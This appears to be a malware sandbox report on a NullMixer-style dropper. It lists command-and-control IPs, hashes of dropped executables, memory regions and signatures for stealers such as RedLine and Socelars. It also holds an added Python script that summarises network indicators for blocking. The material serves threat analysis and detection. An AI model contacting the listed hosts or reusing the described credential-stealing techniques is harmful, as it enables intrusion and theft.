NL 194.104.136.5:46013 tcp
NL 194.104.136.5:46013 tcp
NL 194.104.136.5:46013 tcp
NL 194.104.136.5:46013 tcp
NL 45.9.20.13:80 tcp
NL 194.104.136.5:46013 tcp
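The table above mixes DNS lookups, connections the sandbox could tie to a name, and connections it could not. What a responder wants out of it is the handful of destinations worth blocking: the repeated connection to 194.104.136.5:46013 (a beacon on a non-standard port), the raw-IP targets with no domain label, the domains that were resolved but never connected to by name, and the legitimate services (iplogger.org, pastebin.com, cdn.discordapp.com, ip-api.com) that the report's own signatures flag. The following is an added example written for this page, not sandbox output: it parses a constructed subset of the rows above and produces that summary; the beacon threshold, service lists and the "probable resolution" heuristic are the editor's own choices.

```python
"""Summarise a sandbox network table: beacon candidates, raw-IP connections,
resolved-only domains and abuse of legitimate services.

Added example by the editor, not part of the sandbox output. SAMPLE_TABLE is a
constructed subset of this report's Network rows; thresholds are assumptions.
"""
from collections import Counter

SAMPLE_TABLE = """\
Country Destination Domain Proto
US 8.8.8.8:53 marianu.xyz udp
NL 45.133.1.107:80 tcp
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 iplogger.org udp
US 172.67.74.161:443 iplogger.org tcp
US 8.8.8.8:53 cdn.discordapp.com udp
US 162.159.129.233:443 cdn.discordapp.com tcp
NL 194.104.136.5:46013 tcp
NL 194.104.136.5:46013 tcp
NL 45.9.20.13:80 tcp
NL 194.104.136.5:46013 tcp
US 8.8.8.8:53 pastebin.com udp
US 104.20.3.235:443 pastebin.com tcp
NL 194.104.136.5:46013 tcp
US 72.84.118.132:8080 tcp
NL 194.104.136.5:46013 tcp
US 8.8.8.8:53 www.microsoft.com udp
NO 96.6.17.223:80 www.microsoft.com tcp
"""

# Services the report's signatures flag as abused for hosting/C2 or IP lookup.
HOSTING_SERVICES = {"iplogger.org", "pastebin.com", "cdn.discordapp.com"}
IP_LOOKUP_SERVICES = {"ip-api.com"}
COMMON_PORTS = {"53", "80", "443"}
BEACON_THRESHOLD = 5  # assumed: repeated connects to one socket in a short run


def parse_rows(text):
    """Rows have 3 tokens (no domain label) or 4 tokens; skip the header."""
    rows = []
    for line in text.splitlines():
        parts = line.split()
        if len(parts) == 4:
            country, dest, domain, proto = parts
        elif len(parts) == 3:
            country, dest, proto = parts
            domain = ""
        else:
            continue
        if proto not in ("tcp", "udp"):
            continue
        rows.append({"country": country, "dest": dest, "domain": domain, "proto": proto})
    return rows


def is_dns(row):
    return row["proto"] == "udp" and row["dest"].endswith(":53")


def probable_resolutions(rows):
    """Heuristic: the first unlabelled tcp connection right after a lookup is
    probably that lookup's answer. Only a hint; confirm against the pcap."""
    out, pending = {}, None
    for r in rows:
        if is_dns(r):
            pending = r["domain"]
        elif r["proto"] == "tcp":
            if pending and not r["domain"]:
                out[pending] = r["dest"]
            pending = None
    return out


def summarize(rows):
    dns = {r["domain"] for r in rows if is_dns(r)}
    tcp = [r for r in rows if r["proto"] == "tcp"]
    labelled = {r["domain"] for r in tcp if r["domain"]}
    counts = Counter(r["dest"] for r in tcp)
    probable = probable_resolutions(rows)
    return {
        "beacon_candidates": {d: n for d, n in counts.items() if n >= BEACON_THRESHOLD},
        "raw_ip_connections": sorted({r["dest"] for r in tcp if not r["domain"]}),
        "nonstandard_ports": sorted({r["dest"] for r in tcp
                                     if r["dest"].rsplit(":", 1)[1] not in COMMON_PORTS}),
        "resolved_only": sorted(dns - labelled),
        "hosting_abuse": sorted(dns & HOSTING_SERVICES),
        "ip_lookup": sorted(dns & IP_LOOKUP_SERVICES),
        "probable_resolutions": {d: ip for d, ip in probable.items() if d not in labelled},
    }


if __name__ == "__main__":
    for key, value in summarize(parse_rows(SAMPLE_TABLE)).items():
        print(f"{key:22} {value}")
```

Run over the full table the beacon count for 194.104.136.5:46013 is far higher than in the subset, and 45.9.20.13:80 crosses the threshold too; the resolved-only list then also picks up the lookalike domains (all-mobile-pa1ments.com.mx, buy-fantasy-football.com.sg and the rest) that never produced a labelled connection.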

Files

C:\Users\Admin\AppData\Local\Temp\7zS86973696\setup_install.exe

MD5 47a5d34f871487a79975e5586e63ebdd
SHA1 75f4f1708c2b0a6433f8c0fa6ff47799115b2d2f
SHA256 884c76e10ef7f202b677c0ccfb6e9e009ca79e7189e76509a6449b5f8c2a952f
SHA512 3f96662af4937647a78a0a51cb4916f56ee250ab14094ed608344d727489eb0135b4016a73853ca1f96b165fbe9ac7957adb1cc884fff55cea837f668b157d04

C:\Users\Admin\AppData\Local\Temp\7zS86973696\libwinpthread-1.dll

MD5 1e0d62c34ff2e649ebc5c372065732ee
SHA1 fcfaa36ba456159b26140a43e80fbd7e9d9af2de
SHA256 509cb1d1443b623a02562ac760bced540e327c65157ffa938a22f75e38155723
SHA512 3653f8ed8ad3476632f731a3e76c6aae97898e4bf14f70007c93e53bc443906835be29f861c4a123db5b11e0f3dd5013b2b3833469a062060825df9ee708dc61

C:\Users\Admin\AppData\Local\Temp\7zS86973696\libcurlpp.dll

MD5 e6e578373c2e416289a8da55f1dc5e8e
SHA1 b601a229b66ec3d19c2369b36216c6f6eb1c063e
SHA256 43e86d650a68f1f91fa2f4375aff2720e934aa78fa3d33e06363122bf5a9535f
SHA512 9df6a8c418113a77051f6cb02745ad48c521c13cdadb85e0e37f79e29041464c8c7d7ba8c558fdd877035eb8475b6f93e7fc62b38504ddfe696a61480cabac89

C:\Users\Admin\AppData\Local\Temp\7zS86973696\libgcc_s_dw2-1.dll

MD5 9aec524b616618b0d3d00b27b6f51da1
SHA1 64264300801a353db324d11738ffed876550e1d3
SHA256 59a466f77584438fc3abc0f43edc0fc99d41851726827a008841f05cfe12da7e
SHA512 0648a26940e8f4aad73b05ad53e43316dd688e5d55e293cce88267b2b8744412be2e0d507dadad830776bf715bcd819f00f5d1f7ac1c5f1c4f682fb7457a20d0

memory/2204-56-0x000000006B440000-0x000000006B4CF000-memory.dmp

\Users\Admin\AppData\Local\Temp\7zS86973696\libcurl.dll

MD5 d09be1f47fd6b827c81a4812b4f7296f
SHA1 028ae3596c0790e6d7f9f2f3c8e9591527d267f7
SHA256 0de53e7be51789adaec5294346220b20f793e7f8d153a3c110a92d658760697e
SHA512 857f44a1383c29208509b8f1164b6438d750d5bb4419add7626986333433e67a0d1211ec240ce9472f30a1f32b16c8097aceba4b2255641b3d8928f94237f595

memory/2204-52-0x000000006B280000-0x000000006B2A6000-memory.dmp

\Users\Admin\AppData\Local\Temp\7zS86973696\libstdc++-6.dll

MD5 5e279950775baae5fea04d2cc4526bcc
SHA1 8aef1e10031c3629512c43dd8b0b5d9060878453
SHA256 97de47068327bb822b33c7106f9cbb489480901a6749513ef5c31d229dcaca87
SHA512 666325e9ed71da4955058aea31b91e2e848be43211e511865f393b7f537c208c6b31c182f7d728c2704e9fc87e7d1be3f98f5fee4d34f11c56764e1c599afd02

memory/2204-68-0x000000006B440000-0x000000006B4CF000-memory.dmp

memory/2204-67-0x000000006B440000-0x000000006B4CF000-memory.dmp

memory/2204-66-0x000000006B440000-0x000000006B4CF000-memory.dmp

memory/2204-65-0x0000000064940000-0x0000000064959000-memory.dmp

memory/2204-64-0x000000006494A000-0x000000006494F000-memory.dmp

memory/2204-63-0x000000006FE40000-0x000000006FFC6000-memory.dmp

memory/2204-74-0x000000006B280000-0x000000006B2A6000-memory.dmp

memory/2204-73-0x000000006B280000-0x000000006B2A6000-memory.dmp

memory/2204-72-0x000000006FE40000-0x000000006FFC6000-memory.dmp

memory/2204-71-0x000000006FE40000-0x000000006FFC6000-memory.dmp

memory/2204-69-0x000000006FE40000-0x000000006FFC6000-memory.dmp

memory/2204-70-0x000000006FE40000-0x000000006FFC6000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\7zS86973696\Sat14a7594cc5a0116.exe

MD5 492fe12bd7a2ea0ba1d2a5672f5a013a
SHA1 934a18ff3f83a43ce8c4a3cacba0d30d82c4276c
SHA256 45e13af971ea12864fd315f67096d0547bee1e07994f16bfedba10ca5beaad0f
SHA512 de5c99a7e20949bcd75bde8d971b343a6bae5255b5d46dd9472fde13ab0c3b4ce317eaf44527f79a113e2bd0b0efb0d19a5a53834e9b28a41b4885a888bcfd67

C:\Users\Admin\AppData\Local\Temp\7zS86973696\Sat14514904a4b.exe

MD5 bdbbf4f034c9f43e4ab00002eb78b990
SHA1 99c655c40434d634691ea1d189b5883f34890179
SHA256 2da3696e82b2a874191a6f4e3bfd26d4b7e5aa5d187c5afdebbe52263dccd5ae
SHA512 dc3e513ad8cbb887652660603ce76437c6d3670637a99c1145c08fa23de658a5c5ca395cc8a2532de7b73302e88e0e8f1c026c4bb1b23481a3a5bb2dc92a68ec

C:\Users\Admin\AppData\Local\Temp\7zS86973696\Sat1481f5a7e3eccdd.exe

MD5 9b07fc470646ce890bcb860a5fb55f13
SHA1 ef01d45abaf5060a0b32319e0509968f6be3082f
SHA256 506c6ee68b29701403739da25679b640d21b1b121f45dde5bc25705901a6ed0b
SHA512 4cc1b725c6fb539d832d2d5315bbc63e967a41129d25c2102b2df19e4931e4e06c2a9f70a3336d98b9e031c636d021e713f10dbbd86a57f447a7581221a470cc

C:\Users\Admin\AppData\Local\Temp\7zS86973696\Sat14b47e86b9c16b.exe

MD5 77666d51bc3fc167013811198dc282f6
SHA1 18e03eb6b95fd2e5b51186886f661dcedc791759
SHA256 6a3d44d750ba258b1854431d89db135abc5d543ada1b384c5306e98031b8f1c9
SHA512 a024f008567a7417fe975063f661a0b278fb70c7576a7453e482f2e3f5c6cc48b5faaa55ec197e3082626faaa3598c9ff7bcca798ba7a1408bf666e61fdf4cd0

C:\Users\Admin\AppData\Local\Temp\7zS86973696\Sat1487ca754e680f91.exe

MD5 b4c503088928eef0e973a269f66a0dd2
SHA1 eb7f418b03aa9f21275de0393fcbf0d03b9719d5
SHA256 2a95ce43c87b8a26be71a459eae796a572422bd99cf0b9a3580a3a68e7dbd1a2
SHA512 c6fe2e2b5fbf9348701d1721f2b7ac7589b04b0308ae152e3a7186692b14f35e55bc7eed0c94a03031837b6f2b6aa4dc8d094aefce02913f1fbc4dedea452465

C:\Users\Admin\AppData\Local\Temp\7zS86973696\Sat14febbc433.exe

MD5 4d255e96e5056f2c899884babcc55691
SHA1 44caeb1df6288c94081b805ee17f66db34dc7834
SHA256 e7678a0537796c6199bbc7fc5c143b475280564558250df218d62012c3b98506
SHA512 ad2cebd784a525d3fe2e3523c4f3d2ab793da84811a41b08aae99141d9c53f545b180d36f05647ddef04bba200b6a0fc917e481913f3b2b0162c136ec8355c44

C:\Users\Admin\AppData\Local\Temp\7zS86973696\Sat14f1396dfcf191bd.exe

MD5 15c6dc87edd001c0bf0df6f9405ad7db
SHA1 9582017cd83642ffdac143daeed13e840f4b2350
SHA256 5e7a5af6e0cea11934feaa716867e906644eb20df743b1c5fa85558de0c1b10d
SHA512 6fffd09475af31c9cdc56f561c13921975c236c6590ede369e5d863469452a6224d2ee9550d9f73fb65696c9d46185e487bf0764922c95831882a8029151603f

C:\Users\Admin\AppData\Local\Temp\7zS86973696\Sat1427fbafcf251.exe

MD5 8e0abf31bbb7005be2893af10fcceaa9
SHA1 a48259c2346d7aed8cf14566d066695a8c2db55c
SHA256 2df6cc430475ae053ad2772a3a9d1de1a03af31c3ebfdd0e5d5bd7fbdc61866a
SHA512 ba76470f4896e6bdac508e6a901b352a3bf731ab5680b9931cc1a8c874482cf0c19a374a6a58dda5237178c1861509529a5174bf76fa768efac7989dbc1c1970

C:\Users\Admin\AppData\Local\Temp\7zS86973696\Sat144474a564d26f29.exe

MD5 962b4643e91a2bf03ceeabcdc3d32fff
SHA1 994eac3e4f3da82f19c3373fdc9b0d6697a4375d
SHA256 d2671668c6b2c9da5d319e60dea54361a2cbb362e46628cf0dccb5ff0baf786b
SHA512 ef6f4a5ccfff09506c925003ac49837d771787028fddcf2183e98cba2794df375fd0d5099e36abf8fedfc0dddd10ad076d2fc69a77b8ffd8180215b5cfc88dfd

\Users\Admin\AppData\Local\Temp\7zS86973696\Sat142b09ae40c44cf.exe

MD5 a1d90c2ea649aae4d9492b584c52ef5c
SHA1 32969454090b6dd84a9b97d19bd58845cda5aae6
SHA256 64f7fc506342b8fd9bf09d45a012f9c996237e06cffbade5d3aedb1c8d967023
SHA512 09bf2aa523933dc05fb23a6d97f56ba33ba5894667b62f2275a4e94b86e9ac82d6faeda7dfdc0ac1c966fe13b0be29ae98158850d815021bd88837a3453b6e73

C:\Users\Admin\AppData\Local\Temp\7zS86973696\Sat14d32a38896785b13.exe

MD5 148c3657379750b2fe7237ac1b06f507
SHA1 c464da9412a32ab71cd62491405296672c7ba3ad
SHA256 41a780cbf232d3ed4912406bdbb084f61c9faf56dcc0a7a81381546689170c64
SHA512 360588010bda2d3d514508fe9f2f95f63ca7a78476e24043985c350814c54f25c1f60c45e68e4431c2301f90b4092f88866624b12eb637145403592e7218d6bc

memory/468-123-0x0000000000400000-0x0000000000414000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\WG9PX85Y3ANSBFG02AUK.temp

MD5 fee0d9743a25c648621e1c9dfa375d3b
SHA1 3c8c37b09d02ae8257b88c2501f968b3a639360d
SHA256 5297c6ff118650cca51f23cbb69b55d5eef7d67eafce75fce3ab610ad3cce2d0
SHA512 6e2ab9b59760537e4861cb7ba6d8077cd1adb06e77960cc56c183e7b0522dad76be4fbea315afe9406206eb315c38bcd9c712ece638e92de9e4126431c8e67fc

\Users\Admin\AppData\Local\Temp\7zS86973696\Sat142ac5249376e895.exe

MD5 91e3bed725a8399d72b182e5e8132524
SHA1 0f69cbbd268bae2a7aa2376dfce67afc5280f844
SHA256 18af3c7bdeb815af9abe9dcc4f524b2fb2a33ac9cc6784f31e302c10a8d09a0d
SHA512 280fe25f4813bc261dee3b38ad03364896f3b4f049dcf1d94c6c6e7abb09b47e06445746719d902281d04cc15879d745dd0b71a466fa31f952ae51f90360ae76

memory/1624-144-0x0000000001080000-0x00000000010E8000-memory.dmp

memory/1960-143-0x0000000001280000-0x0000000001298000-memory.dmp

memory/1988-149-0x0000000000400000-0x0000000000414000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\is-PEG5V.tmp\Sat1481f5a7e3eccdd.tmp

MD5 9303156631ee2436db23827e27337be4
SHA1 018e0d5b6ccf7000e36af30cebeb8adc5667e5fa
SHA256 bae22f27c12bce1faeb64b6eb733302aff5867baa8eed832397a7ce284a86ff4
SHA512 9fe100fafb1c74728109667b5a2261a31e49c45723de748adaa1d9cb9f8daa389b871056c70066fa3a05be82a5017c8dd590ae149a56d824a9e250d31091a40f

C:\Users\Admin\AppData\Local\Temp\is-L7CCU.tmp\_isetup\_shfoldr.dll

MD5 92dc6ef532fbb4a5c3201469a5b5eb63
SHA1 3e89ff837147c16b4e41c30d6c796374e0b8e62c
SHA256 9884e9d1b4f8a873ccbd81f8ad0ae257776d2348d027d811a56475e028360d87
SHA512 9908e573921d5dbc3454a1c0a6c969ab8a81cc2e8b5385391d46b1a738fb06a76aa3282e0e58d0d2ffa6f27c85668cd5178e1500b8a39b1bbae04366ae6a86d3

C:\Users\Admin\AppData\Local\Temp\is-L7CCU.tmp\idp.dll

MD5 b37377d34c8262a90ff95a9a92b65ed8
SHA1 faeef415bd0bc2a08cf9fe1e987007bf28e7218d
SHA256 e5a0ad2e37dde043a0dd4ad7634961ff3f0d70e87d2db49761eb4c1f468bb02f
SHA512 69d8da5b45d9b4b996d32328d3402fa37a3d710564d47c474bf9e15c1e45bc15b2858dbab446e6baec0c099d99007ff1099e9c4e66cfd1597f28c420bb50fdcc

memory/468-151-0x0000000000400000-0x0000000000414000-memory.dmp

memory/964-148-0x0000000000400000-0x00000000004BD000-memory.dmp

memory/1288-142-0x0000000000EA0000-0x0000000000EA8000-memory.dmp

memory/1960-164-0x0000000000240000-0x0000000000246000-memory.dmp

memory/2216-179-0x0000000000A80000-0x0000000000C28000-memory.dmp

memory/2204-195-0x000000006FE40000-0x000000006FFC6000-memory.dmp

memory/2204-194-0x0000000064940000-0x0000000064959000-memory.dmp

memory/2204-193-0x000000006B440000-0x000000006B4CF000-memory.dmp

memory/2204-192-0x000000006B280000-0x000000006B2A6000-memory.dmp

memory/2204-190-0x000000006EB40000-0x000000006EB63000-memory.dmp

memory/2204-185-0x0000000000400000-0x000000000051C000-memory.dmp

memory/2892-215-0x0000000000400000-0x000000000041E000-memory.dmp

memory/2892-213-0x0000000000400000-0x000000000041E000-memory.dmp

memory/2892-212-0x0000000000400000-0x000000000041E000-memory.dmp

memory/2892-211-0x000000007EFDE000-0x000000007EFDF000-memory.dmp

memory/2892-209-0x0000000000400000-0x000000000041E000-memory.dmp

memory/2892-207-0x0000000000400000-0x000000000041E000-memory.dmp

memory/2892-205-0x0000000000400000-0x000000000041E000-memory.dmp

memory/2892-203-0x0000000000400000-0x000000000041E000-memory.dmp

memory/2216-216-0x0000000002BB0000-0x0000000002C55000-memory.dmp

memory/2216-220-0x0000000002C60000-0x0000000002CF2000-memory.dmp

memory/2216-223-0x0000000002C60000-0x0000000002CF2000-memory.dmp

memory/1924-224-0x0000000000400000-0x0000000000883000-memory.dmp

memory/1672-225-0x0000000000400000-0x000000000089C000-memory.dmp

memory/2216-229-0x0000000000A80000-0x0000000000C28000-memory.dmp

memory/2652-228-0x0000000000400000-0x00000000004BD000-memory.dmp

memory/1988-227-0x0000000000400000-0x0000000000414000-memory.dmp

memory/1672-230-0x0000000000400000-0x000000000089C000-memory.dmp

memory/2216-238-0x0000000002C60000-0x0000000002CF2000-memory.dmp

memory/2216-240-0x0000000004AB0000-0x0000000004B3C000-memory.dmp

memory/2216-239-0x0000000002D00000-0x0000000004AAF000-memory.dmp

memory/2216-242-0x0000000004B40000-0x0000000004BC9000-memory.dmp

memory/2216-241-0x0000000004B40000-0x0000000004BC9000-memory.dmp

memory/2216-244-0x0000000004B40000-0x0000000004BC9000-memory.dmp

memory/2216-245-0x0000000000120000-0x0000000000121000-memory.dmp

memory/2216-246-0x0000000000130000-0x0000000000134000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\Cab28A6.tmp

MD5 49aebf8cbd62d92ac215b2923fb1b9f5
SHA1 1723be06719828dda65ad804298d0431f6aff976
SHA256 b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f
SHA512 bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

Analysis: behavioral4

Detonation Overview

Submitted

2024-11-23 18:41

Reported

2024-11-23 18:43

Platform

win10v2004-20241007-en

Max time kernel

87s

Max time network

151s

Command Line

"C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"

Signatures

Detect Fabookie payload

Description Indicator Process Target
N/A N/A N/A N/A

Fabookie

spyware stealer fabookie

Fabookie family

fabookie

GCleaner

loader gcleaner

Gcleaner family

gcleaner

NullMixer

dropper nullmixer

Nullmixer family

nullmixer

OnlyLogger

loader onlylogger

Onlylogger family

onlylogger

PrivateLoader

loader privateloader

Privateloader family

privateloader

RedLine

infostealer redline

RedLine payload

Description Indicator Process Target
N/A N/A N/A N/A

Redline family

redline

Socelars

stealer socelars

Socelars family

socelars

Socelars payload

Description Indicator Process Target
N/A N/A N/A N/A

OnlyLogger payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

ASPack v2.12-2.42

aspackv2
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Control Panel\International\Geo\Nation C:\Windows\SysWOW64\mshta.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Control Panel\International\Geo\Nation C:\Windows\SysWOW64\mshta.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\setup_installer.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\7zS0E3227A7\Sat142b09ae40c44cf.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\is-KMO4M.tmp\Sat1481f5a7e3eccdd.tmp N/A
Key value queried \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Control Panel\International\Geo\Nation C:\Windows\SysWOW64\mshta.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\JYCWewAX2vPOJ.EXE N/A

Reads user/profile data of web browsers

spyware stealer

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A

Drops Chrome extension

Description Indicator Process Target
File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\hemlmgggokggmncimchkllhcjcaimcle\9.86.66_0\manifest.json C:\Users\Admin\AppData\Local\Temp\7zS0E3227A7\Sat14b47e86b9c16b.exe N/A

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A iplogger.org N/A N/A
N/A iplogger.org N/A N/A
N/A iplogger.org N/A N/A
N/A iplogger.org N/A N/A
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A ip-api.com N/A N/A

Looks up geolocation information via web service

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 4840 set thread context of 4476 N/A C:\Users\Admin\AppData\Local\Temp\7zS0E3227A7\Sat1427fbafcf251.exe C:\Users\Admin\AppData\Local\Temp\7zS0E3227A7\Sat1427fbafcf251.exe

Browser Information Discovery

discovery

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS0E3227A7\Sat14a7594cc5a0116.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS0E3227A7\Sat1427fbafcf251.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\msiexec.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS0E3227A7\setup_install.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\mshta.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS0E3227A7\Sat142b09ae40c44cf.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS0E3227A7\Sat1481f5a7e3eccdd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS0E3227A7\Sat1427fbafcf251.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\is-KMO4M.tmp\Sat1481f5a7e3eccdd.tmp N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\taskkill.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS0E3227A7\Sat14b47e86b9c16b.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS0E3227A7\Sat1487ca754e680f91.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\mshta.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS0E3227A7\Sat142ac5249376e895.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS0E3227A7\Sat1481f5a7e3eccdd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\is-MQ2LG.tmp\Sat1481f5a7e3eccdd.tmp N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\taskkill.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\setup_installer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS0E3227A7\Sat144474a564d26f29.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS0E3227A7\Sat14febbc433.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\mshta.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\JYCWewAX2vPOJ.EXE N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A

Checks SCSI registry key(s)

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\7zS0E3227A7\Sat14a7594cc5a0116.exe N/A
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\7zS0E3227A7\Sat14a7594cc5a0116.exe N/A
Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\7zS0E3227A7\Sat14a7594cc5a0116.exe N/A

Enumerates system info in registry

Description Indicator Process Target
